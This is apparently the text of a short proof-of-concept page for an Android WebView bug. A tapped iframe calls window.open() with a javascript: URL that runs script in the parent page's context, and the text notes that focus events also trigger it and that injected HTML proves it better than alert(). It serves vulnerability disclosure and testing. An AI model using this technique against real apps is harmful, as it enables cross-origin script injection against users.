iframe on Tap/click this iframe, which will call window.open() with javascript: URL which executes in parent page context. (Observe injected HTML in parent page, and potentially an alert() dialog) Other events which result in user activations consumable by window.open() also work, such as focus events. The alert() test is not reliable because if WebChromeClient.onJsAlert() is not defined or returns false, no alert dialog box will be shown despite PoC working. Other actions are more reliable, such as injecting HTML into parent page.